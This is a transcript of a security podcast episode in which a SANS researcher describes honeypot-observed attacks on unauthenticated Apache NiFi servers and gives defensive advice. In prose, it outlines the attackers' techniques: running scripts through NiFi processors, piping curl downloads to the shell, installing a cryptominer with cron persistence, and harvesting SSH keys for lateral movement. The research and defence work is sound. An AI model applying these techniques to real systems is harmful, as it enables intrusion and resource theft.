Research Saturday 6.17.23
Ep 286 | 6.17.23

Managing machine learning risks.


Dave Bittner: Hello, everyone and welcome to the CyberWire's "Research Saturday". I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.

Johannes Ullrich: What we saw is in our honeypot network, we sort of get alerts whenever there's a new kind of URL that is being probed, gnarly bots, and one of the URLs that sort of caused a spike here was called /NiFi, which of course, initially didn't really ring a bell, but then doing some digging into it, we figured out that this is likely going after Apache NiFi, which is often described as a data orchestration platform.

Dave Bittner: That's Johannes Ullrich. He's the Dean of Research at the SANS Technology Institute. The research we're discussing today is titled Machine Learning Risks, Attacks against Apache NiFi.

Yeah, I have to admit NiFi was a new one to me. It had me running to search for exactly what it was. Can you describe to us what is the general use case for Apache NiFi?

Johannes Ullrich: Yeah, so a little bit history here. It actually was developed by the NSA, who open sourced it about 10 years ago, and the Apache project sort of took over maintenance of it. It's described as a data orchestration platform. What it does, it reads data from a large number of sources, whether that's like cloud storage database and such. You can filter it. You can extract subsets of the data, and it'll save it back and -- or send it back to some destination. And again, you have a wide range here. So use case are, for example, in business data, you receive data from a database that you then need to adapt in order to use it, for example, in some kind of analytic system. It's also often used these days in machine learning, because you have these large data sets that you need to adapt in order to then process them in your machine-learning algorithm, so these are some of the use cases here. It's written in Java, and one of the nice things about it is you don't really need to do a lot of coding with it. It sort of presents GUI web interface. You can sort of drop and track your sources. You can configure credentials for your S3 bucket and tell it hey, you know, read that JSON file, pull it out there, turn on XML file that maybe my enterprise resource planning system can read.

Dave Bittner: Well, let's walk through this together. I mean, as you say, you were noticing some things on your honeypots. Where did it go from there?

Johannes Ullrich: Well, then of course, we wanted to figure out, what's it actually attempting to do here? They're definitely looking for a NiFi, but why is a person's next question. There is, of course, some interesting data often in these NiFi systems. So what we did is we set up an actual NiFi instance. The problem of course, with this, off the scruff of a full-interaction honeypot, is you can't really set up a lot of them. We set up one of them, but our honeypot network, we have sort of the feature where we can redirect queries from the honeypots to a system like this. So a subset of the honeypots were now assessing, whenever he saw something going to port 8080 or 8443, which are default ports for Apache and NiFi, whenever they saw something, well they were just proxying it, our real NiFi instance, that they weren't able to monitor. And, of course, the attacker, well, they couldn't tell that this was a honeypot anymore. They consider that real NiFi instance. It's actually -- well, it was. It was a real full-feature --

Dave Bittner: Right.

Johannes Ullrich: -- NiFi instance.

Dave Bittner: So you see them coming in and searching for this, and when they hit the NiFi instance, what do they do?

Johannes Ullrich: Well, there are sort of two things we saw, as one thing was they installed a cryptocoin miner, of course. It was a little bit of a letdown initially, I have to admit, because that's what everybody does.

Dave Bittner: Right, right.

Johannes Ullrich: And they used a feature. It's not a vulnerability. So I want to point out here that at no time, they actually abused vulnerability or some kind of zero-day or such here. We had a completely patched and up-to-date version of NiFi but -- well, NiFi has sort of a feature built in that allows you to execute code, and that's the sort of processor that can start to process your data where you can basically load scripts that will process your data, and with that, you have the ability to run our code. The real problem here is that the attacker, well, took advantage off of not requiring a password to actually access NiFi. It's highly recommended in documentation, but who reads the manual, kind of, so?

Dave Bittner: So I mean, is this primarily a configuration issue where folks who are making use of this are neglecting to properly secure it or exposing it to the internet to begin with?

Johannes Ullrich: I think both. So you never really should expose something like this to the internet. It's a very complex system. It had vulnerabilities in the past, nothing really super critical, so they have done a reasonably good job there, but the number one problem is that configuration issue that you didn't configure a password, and it's not hard. Like I said, there is documentation for it to have a simple command to set up a password. So it's not really all that difficult. It becomes a real problem if you actually process real data with NiFi, because now you not only have access to the data, but also credentials, because in order for NiFi to access the data, well, NiFi needs to know how to connect to that database, how to connect to that S3 bucket. That information, an attacker could also retrieve from NiFi, if there's no password or a weak password. The other thing we then saw is that in addition to installing cryptocoin miner -- like I said, that was sort of a little bit of a letdown -- it's the most they did. But there were a couple of attackers also that used NiFi to then probe the network.

Dave Bittner: Huh.

Johannes Ullrich: So once you they control of the NiFi server, they didn’t always offer us lateral movement, where they'll search the NiFi server for credentials, in particular SSH keys. They looked at, hey, did anybody log in this NiFi server and then connect anywhere else via SSH? So they went all through the account and host combinations there and basically tried to abuse any of them to gain additional access to systems.

[ Music ]

Dave Bittner: Now, for the folks who are running this NiFi instance, say someone comes in and drops a cryptominer in, does that -- I mean, is it obvious that that has happened or does it run quietly behind the scenes?

Johannes Ullrich: Well, it depends on how careful you look. Within the GUI, you will see these processors that the attacker set up. So that's something that you should notice. Of course, if you have a very complex instance, there may be tons of process already have configured. It may not be that obvious that you actually have a new one here and it wasn't authorized. In the case that we observed, the attacker also set up a cron job in order to have sort of a backup in case that process gets deleted or, you know, NiFi gets removed from that system. The cron job would run once a minute and try to reinstall things again. Overall, this was fairly noisy, so an attack, an administrator should be able to notice that if they're watching. Let's face it. They didn't start by setting up a password for it so --

Dave Bittner: Fair enough.

Johannes Ullrich: -- who knows what else is missing there. And, you know, of course, all network connections and outbound from that system and such, which may or may not be notable, depending on, you know, how noisy your network is in general.

Dave Bittner: Yeah. Now, in your research, correct me if I'm wrong here, this is all running in RAM, so it's trying to hide itself that way?

Johannes Ullrich: Yeah, so the install script that's being downloaded is never saved to disk. It's a simple bash script. It just uses curl, the command line command to retrieve commands or retrieve files via HTTP posit directly to .sh, to the shell, so that's never being saved. The cryptocoin miner they're downloading is being saved. Some of the other things like the SSH scanning of other machines, also, no real files being saved here. It does the same thing. It just downloads it via curl and pipes it directly to shell, so while you may find some sort of miscellaneous evidence of this, there is no actual sort of file being saved on the system.

Dave Bittner: Yeah. I mean, is it fair to say from your description here that we're looking at opportunists, basically? This isn't a high level of sophistication?

Johannes Ullrich: Correct. This looks like opportunists. Cryptocoin miner, of course, could also be sort of their last resort kind of if they don't find anything else interesting to do with this instance, and our instance didn't really have any interesting data that they say, you know, let's make some cryptocoins while we're in here, and the sort of use data this way. The interesting part was there was really just one attacker who is really heavily scanning for this. Also, we then sort of went through some searching to see really, you know, who's actually exposing NiFi and found a lot of sort of cloud instances like technoloader and such for people had NiFi set up, and that's of course, where the entire issue with blocking attacks becomes more tricky because, well, now your NiFi instance is in the cloud. You have to connect to it via the open internet unless you set up some careful IP address filtering, which you easily get wrong, and then you lose access to it. So that may be one reason why there are these exposed NiFi instances.

Dave Bittner: Yeah, that's interesting. Any idea who is behind this? You said it seems to be coming from one place primarily?

Johannes Ullrich: Yeah, we saw sort of a lot of sort of Russian IPs, as far as of the infrastructure where all of the hosts are located, where all the scripts are being loaded from. Some Ukrainian hosts, one in particular does a lot of scanning for us these days, sometimes geolocation with Ukraine versus Russia can be a little bit tricky here. Hadn't really looked that close into it, but hadn't really sort of found any strong evidence as far as nationality or so goes. It's using commodity malware. Like this cryptocoin miner is fairly commonly found, so I'm not really sure if that's one actor or another. It could be anybody.

Dave Bittner: Yeah. Any notion of how widespread this is?

Johannes Ullrich: Well, like I said, we really see one attacker who is trying it really hard. As far as open NiFi instances, a sort of quick scan of the standard search engine shows a couple of 100 maybe that are out there that are open sort of to the public on default ports. Hadn't really looked too closely how many are maybe hiding a little bit on slightly different URLs, but this attacker really seems to go sort of for these default instances. This could also be something where an attacker, once they gain access to a network is looking for these NiFi instances, because after all, they will allow that operating code execution, so that would be sort of other than an initial sort of lateral movement again, for an attacker who breached a network with a NiFi instance.

Dave Bittner: Right, right. I'm here. While I'm here, I might as well drop a cryptocurrency miner, right?

Johannes Ullrich: Yeah, or just to look for any data being touched by NiFi, and that's sort of something we'll probably do in the futures of put some credentials in there and see if they're then being used.

Dave Bittner: Right. So what are the recommendations then for folks who are using Apache NiFi, what sort of things should they be looking out for here?

Johannes Ullrich: I think the number one thing is right now just inventory, that's sort of one problem here. You may find, you know, data scientists, people in like business analytics and such that setup NiFi instances in the cloud without necessarily -- so if that rogue IT kind of issue where they don't necessarily properly account for it, and so it never really gets properly configured and patched and all of that good stuff, but the number one thing is if you have NiFi, put a password in there. Even a weak password is better than no password, but while you're at it --

Dave Bittner: Right.

Johannes Ullrich: -- pick something a little bit better than NiFi kind of as a password.

Dave Bittner: Right, NiFi1, yeah.

Johannes Ullrich: Yeah.

Dave Bittner: Right, while you're putting in a password, oh, what the heck, make it a strong one.

Johannes Ullrich: Yes. I don't think there's much sort of in terms of strong authentication yet, but I haven't really looked into how it sort of would integrate with any kind of SSL or such.

Dave Bittner: Right, right. It's really an interesting case here because, I mean, obviously a legitimate tool, not terribly widespread usage it would seem, and yet, you know, some clever hacker out there has found a way to use it to their advantage. I suppose it's kind of a cautionary tale.

Johannes Ullrich: Yeah, and that's really just if it's out there, if it's vulnerable, they'll find it and they may find it before you find it, and that's one of the big problem.

Dave Bittner: Our thanks to Johannes Ullrich from the SANS Technology Institute for joining us. The research is titled Machine Learning Risks, Attacks Against Apache NiFi. We'll have a link in the show notes.

The CyberWire "Research Saturday" Podcast is a production of N2K Networks, proudly produced in Maryland out of the startup studios of Data Tribe, where they're co-building the next generation of cybersecurity teams and technologies. This episode was produced by Liz Irvin and Senior Producer Jennifer Eiben. Our mixer is Elliott Peltzman. Our Executive Editor is Peter Kilpe, and I'm Dave Bittner. Thanks for listening.